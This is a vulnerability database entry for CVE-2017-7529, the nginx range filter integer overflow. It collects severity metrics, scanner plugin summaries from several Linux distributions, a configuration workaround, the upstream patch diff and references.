Vulnerabilities > CVE-2017-7529 - Integer Overflow or Wraparound vulnerability in multiple products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
NONE Availability impact
NONE Summary
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Forced Integer Overflow This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.
Nessus
NASL family Amazon Linux Local Security Checks NASL id ALA_ALAS-2017-894.NASL description A flaw within the processing of ranged HTTP requests has been discovered in the range filter module of nginx. A remote attacker could possibly exploit this flaw to disclose parts of the cache file header, or, if used in combination with third party modules, disclose potentially sensitive memory by sending specially crafted HTTP requests. (CVE-2017-7529) last seen 2020-06-01 modified 2020-06-02 plugin id 103228 published 2017-09-15 reporter This script is Copyright (C) 2017-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/103228 title Amazon Linux AMI : nginx (ALAS-2017-894) NASL family Fedora Local Security Checks NASL id FEDORA_2017-AECD25B8A9.NASL description This update includes nginx 1.12.1, fixing CVE-2017-7529, and adds the http_auth_request module. See http://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html for more information on CVE-2017-7529. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-08-24 plugin id 102719 published 2017-08-24 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102719 title Fedora 26 : 1:nginx (2017-aecd25b8a9) NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_B28ADC5B669311E7AD43F0DEF16C5C1B.NASL description Maxim Dounin reports : A security issue was identified in nginx range filter. A specially crafted request might result in an integer overflow and incorrect processing of ranges, potentially resulting in sensitive information leak (CVE-2017-7529). last seen 2020-06-01 modified 2020-06-02 plugin id 101381 published 2017-07-12 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101381 title FreeBSD : nginx -- a specially crafted request might result in an integer overflow (b28adc5b-6693-11e7-ad43-f0def16c5c1b) NASL family Debian Local Security Checks NASL id DEBIAN_DLA-1024.NASL description It was discovered that there was vulnerability in the range filter of nginx, a web/proxy server. A specially crafted request might result in an integer overflow and incorrect processing of HTTP ranges, potentially resulting in a sensitive information leak. For Debian 7 last seen 2020-03-17 modified 2017-07-14 plugin id 101535 published 2017-07-14 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101535 title Debian DLA-1024-1 : nginx security update NASL family Web Servers NASL id NGINX_1_13_3.NASL description According to its Server response header, the installed version of nginx is prior to 1.12.1 or 1.13.x prior to 1.13.3. It is, therefore, affected by an integer overflow vulnerability in the range filter module. An unauthenticated, remote attacker can exploit this, via a specially crafted request to disclose potentially sensitive information. last seen 2020-05-09 modified 2018-10-16 plugin id 118151 published 2018-10-16 reporter This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/118151 title nginx Data Disclosure Vulnerability NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-3352-1.NASL description It was discovered that an integer overflow existed in the range filter feature of nginx. A remote attacker could use this to expose sensitive information. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 101546 published 2017-07-14 reporter Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101546 title Ubuntu 14.04 LTS / 16.04 LTS / 16.10 / 17.04 : nginx vulnerability (USN-3352-1) NASL family Fedora Local Security Checks NASL id FEDORA_2017-C27A947AF1.NASL description This update includes nginx 1.12.1, fixing CVE-2017-7529, and adds the http_auth_request module. See http://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html for more information on CVE-2017-7529. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-08-24 plugin id 102720 published 2017-08-24 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102720 title Fedora 25 : 1:nginx (2017-c27a947af1) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-3908.NASL description An integer overflow has been found in the HTTP range module of Nginx, a high-performance web and reverse proxy server, which may result in information disclosure. last seen 2020-06-01 modified 2020-06-02 plugin id 101490 published 2017-07-13 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101490 title Debian DSA-3908-1 : nginx - security update NASL family SuSE Local Security Checks NASL id OPENSUSE-2018-316.NASL description This update for nginx to version 1.13.9 fixes the following issues : - CVE-2017-7529: nginx: Integer overflow in nginx range filter module allowed memory disclosure (bsc#1048265) This update also contains all updates and improvements in 1.13.9 upstream release. last seen 2020-06-05 modified 2018-03-27 plugin id 108639 published 2018-03-27 reporter This script is Copyright (C) 2018-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/108639 title openSUSE Security Update : nginx (openSUSE-2018-316) NASL family Web Servers NASL id NGINX_1_13_2.NASL description According to the self-reported version in its response header, the version of nginx hosted on the remote web server is < 1.13.2. It is, therefore, affected by an integer overflow vulnerability last seen 2020-05-01 modified 2020-05-02 plugin id 105359 published 2017-12-18 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105359 title nginx < 1.13.2 Integer Overflow Vulnerability NASL family PhotonOS Local Security Checks NASL id PHOTONOS_PHSA-2017-0038.NASL description An update of [gnutls, c-ares, nginx, mercurial, linux, mesos, git, binutils, krb5, dnsmasq] packages for PhotonOS has been released. last seen 2019-02-21 modified 2019-02-07 plugin id 111887 published 2018-08-17 reporter Tenable source https://www.tenable.com/plugins/index.php?view=single&id=111887 title Photon OS 1.0: Binutils / C / Dnsmasq / Git / Gnutls / Krb5 / Linux / Mercurial / Mesos / Nginx PHSA-2017-0038 (deprecated) NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-867.NASL description This update for nginx fixes the following issues : - CVE-2017-7529: A remote attacker could have used specially crafted requests to trigger an integer overflow the nginx range filter module to leak potentially sensitive information (boo#1048265) last seen 2020-06-05 modified 2017-07-31 plugin id 102057 published 2017-07-31 reporter This script is Copyright (C) 2017-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/102057 title openSUSE Security Update : nginx (openSUSE-2017-867)
Redhat
| advisories |
| ||||
| rpms |
|
Seebug
| bulletinFamily | exploit |
| description | A security issue was identified in nginx range filter. A specially crafted request might result in an integer overflow and incorrect processing of ranges, potentially resulting in sensitive information leak (CVE-2017-7529). When using nginx with standard modules this allows an attacker to obtain a cache file header if a response was returned from cache. In some configurations a cache file header may contain IP address of the backend server or other sensitive information. Besides, with 3rd party modules it is potentially possible that the issue may lead to a denial of service or a disclosure of a worker process memory. No such modules are currently known though. The issue affects nginx 0.5.6 - 1.13.2. The issue is fixed in nginx 1.13.3, 1.12.1. For older versions, the following configuration can be used as a temporary workaround: ``` max_ranges 1; ``` **patch** ``` diffsrc/http/modules/ngx_http_range_filter_module.c b/src/http/modules/ngx_http_range_filter_module.c --- src/http/modules/ngx_http_range_filter_module.c +++ src/http/modules/ngx_http_range_filter_module.c @@ -377,6 +377,10 @@ ngx_http_range_parse(ngx_http_request_t range->start = start; range->end = end; + if (size > NGX_MAX_OFF_T_VALUE - (end - start)) { + return NGX_HTTP_RANGE_NOT_SATISFIABLE; + } + size += end - start; if (ranges-- == 0) { ``` |
| id | SSV:96273 |
| last seen | 2017-11-19 |
| modified | 2017-07-13 |
| published | 2017-07-13 |
| title | Nginx Remote Integer Overflow Vulnerability(CVE-2017-7529 ) |
References
- http://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html
- http://www.securityfocus.com/bid/99534
- http://www.securitytracker.com/id/1039238
- https://puppet.com/security/cve/cve-2017-7529
- https://access.redhat.com/errata/RHSA-2017:2538
- https://support.apple.com/kb/HT212818
- http://seclists.org/fulldisclosure/2021/Sep/36